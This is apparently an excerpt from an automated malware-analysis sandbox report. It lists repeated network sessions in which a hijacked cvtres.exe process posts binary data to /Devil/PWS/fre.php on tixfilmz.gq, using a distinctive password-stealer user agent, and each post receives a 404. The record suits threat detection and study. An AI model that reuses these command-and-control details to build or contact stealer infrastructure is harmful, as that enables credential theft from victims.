                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.349762188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:35.961536884 CEST1064OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:36.063500881 CEST1065INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BDDcJA9loNSYiH0%2BzGFmVbKmzSb%2Ff5hpB1MM20uTsti37mQygz7a4phBDXPmpiRJpWyppkWO1aCufCSBc61S3fu9WYSM8a3mgQ9baO8%2FIg4rJNzKepSDyKU5TN5C7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e36c9bb5c50-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.349763188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:39.324990988 CEST1066OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:39.416142941 CEST1067INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0NEMPzCv%2BglpdrXSrBrz41omROycORcGwZRT8uzlQMUlk9El6ItPaLC0Fo6hrzsBTBR%2Bgbawx8OEpKTh5mEACiFWQH3CR3z30oVs%2BC%2FSx0oRn4PnrWKdRHDRuREQvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e4bcaa1bbf5-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.349764188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:41.209816933 CEST1067OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:41.306250095 CEST1068INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUYSQmDNLM25L3Xc5iUuFUSvf59cAHIJ%2FyW%2FdECVdBBKZeP7djubS9URGb%2B504ohSvLJdBV5cJr%2BQkwAyXFP0K6zoiBUy0%2BSXhh%2BWUAlw%2B7PQuD8mVJaui9lgSztuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e579eecbb85-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.349766188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:42.773950100 CEST1081OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:42.869123936 CEST1094INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E7vSqzyZk3qIwXx9eUocaI9hXGtrWZPhFgRL0EBT5ZsuSpNKLZmWOC1rHM36XQm4Si%2FsrLKJFtM4XlTXuHulsyaWTJ9knN%2BaJT8klsOGYIdLAk0HH3jyCnb6Mgt4aQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e615e119bb3-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.349774188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:44.099149942 CEST1187OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:44.189769983 CEST1204INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S4oxOBWv%2B4UOVMwb0kDScW1nQwQrd5EacUvdKMaUqDq9Z1JWbQ1YF%2FYBVr7gB1AuQpiog2uSyIguk96hVrenhW0UVTED95Y8lUk9jln%2FKYpiuz5llJWMVaTU2P9upQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e69acc4bb86-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.349777188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:45.276947975 CEST1234OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:45.373523951 CEST1235INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CTFZF%2BWEcf%2FZ3ve0OTQGqdgiQcRFWglSF2ioHkR1%2B1Dt8yFUGv%2FbQkYy3SgYWtYfRTt%2Fu1iWEP2lKl5AFOepBLjGhytA9dH7hUwySrO%2FraUqHxKumZ8Zds8T3nsBFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e710fd8926d-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.349778188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:46.945645094 CEST1236OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:47.043102980 CEST1237INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KE5YLOzAxfxUnOqS9Yf%2Fh%2FyGk7n8MwLfQafrSeANUvgLxd5QwzD7KKvTWDJjn0hBBTMgo0iyw9pagijUx6QdFa01qDWZr6PsnY4%2BoTD0nvKrpk2M20K6fr86jy04vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e7b6f759b95-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.349780188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:49.154690027 CEST1238OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:49.279305935 CEST1239INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x4NOgxjp5bamSb5%2BEGCU0lIDm14biGjteevVZ1anxZu4L0uIwVi%2F4E6I8kDhwGQjgjRvJ0SlP3vpL9jSfqjTJGOkNcR57X%2FhUTbcaZ3QMoTrnypJ%2B1ZRujwexFap4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e893a77bc01-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.349782188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:50.570997000 CEST1240OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:50.665591955 CEST1241INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R8wPA8bakoFeAux%2BPghUTfYdyrLQJAPleFgfZf1TztZzoaXyuxTpp%2BY3m%2BZn8tBonTuOV6rdaOFSE7zkck%2FyMJ1y6CBC5ezSeohSLmU73ysrJ1IDe9iQzJ1%2BSFTulg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e921cecbb32-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.349785188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:51.879415035 CEST1251OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:51.983930111 CEST1252INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0in6Ayj8I3zO6NO1iFxs%2Bdf30Iekyj2pJivQsyFDdGqf%2Fdfsg4DG5bw119gvvuAAXzm1JIN5aN1ROwd%2BBLhLBUlg7X7WLzIMXsz6zOalbMhpxzCC9JW6xboqYwa3lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e9a4dd19b57-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.349745188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:16.160936117 CEST1032OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:16.296185017 CEST1033INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mgEHyzNGG3wTlvIqrFT9Qg9CyoJJco9av7NNGpAxa4Lv150iQghRp9kjVuXQ7MMVm025fTNlO4GAiU0JtozkA90G4dr6yvHcKVA0lMkDoG%2BgwlguHut59hkTKxPVSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dbb0f449bbc-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.349786188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:53.219319105 CEST1253OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:53.353355885 CEST1264INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pgNEJXZGOHn5Egc%2FCUfGGyJgE0wCr2whFXS4CpUoV5rbFo71CqRWstxCdJot%2BnpztUTC6k4pFu4PcMAf8lGER02%2FUesG3wyV3uvFGhNzYS2f3WfRSY%2F07O3swpFd5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ea2af54bba9-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.349788188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:54.331478119 CEST1265OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:54.430865049 CEST1266INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Oz58tFC9j%2F%2FUWYTDA2KIPUhsEEJLq3Fj%2F%2FNjwIxsOu3JbAS5a4UeBpXda4G3IGkrnybQ309H0O4WVRE4wWmTnDnp5%2BTOCGJvzW5H1baNzJblY%2BgusnlFAaq0GMzbVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ea9998f915e-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.349789188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:55.412962914 CEST1266OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:55.514800072 CEST1267INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tfWHw3Y7kyqn%2F4%2B1%2B7SsB4DAFkWwDMis5E17WBWPeB%2B1y3Yz03f8Y%2FFfLTVCggCzJy4tne%2BaNzObkADXLk7hgGQ0oEnf93MB%2BBBpZYsnzAcE0T0at%2F0D%2BYqTVnup8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4eb05c1f9a03-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.349790188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:56.651534081 CEST1268OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:56.784835100 CEST1269INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Da0vd73KcmCTeEN%2BL%2FYCdduFmS4E%2FXVcmHKEeTqY%2BAc5PKMghAzTybst0WOO9BHlZaawlYj7DAXooADXC6OTMEvQCxVbFsBFdWZJdaHCwlev49UDMsvp3BmP5%2F0nYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4eb818af9125-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.349791188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:58.117985964 CEST1270OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:58.219897032 CEST1271INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZrTeGoF3nVYrkeUhvxWoh9%2FRj%2BhzIrdJ72hwRm%2FxaYpomKIxqw1dSkapXe2%2FFFdZMPIoGcvl6mo9%2BrEob%2BGb%2BKOz8%2FDFTjZsBY8cTnoBJamVqmyew15WcilG2H%2Fhwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ec14b8790ee-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.349792188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:59.404300928 CEST1272OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:59.501753092 CEST1273INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LWjiKYUlgHWx9Pm7GKhgqpidlITqIADQyq1TP9zHBOHabXDileoLfhOJYU89jDeWU1D%2Br5cDTxfRYL3B8GPfifjuyc8DSSD71ocPRwJOZpnoHF%2FboHrn2acvE8UDzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ec94defbbe9-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  36192.168.2.349793188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:00.645450115 CEST1274OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:00.737303972 CEST1275INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u1dKGquQ9Ixx8o9iJKj1wlKWK5rPFLMBf4%2FyMkIxmpMjc07V8KaBqcSKkZ4KNfyS5RxQ4J0zBYSzGTXjjjoRfC6Y7ISEYFRnMhhWIOfRQ5yilBTZD9ZKETYJbLkvmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ed10a599b69-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  37192.168.2.349794188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:01.964847088 CEST1276OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:02.082334042 CEST1277INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
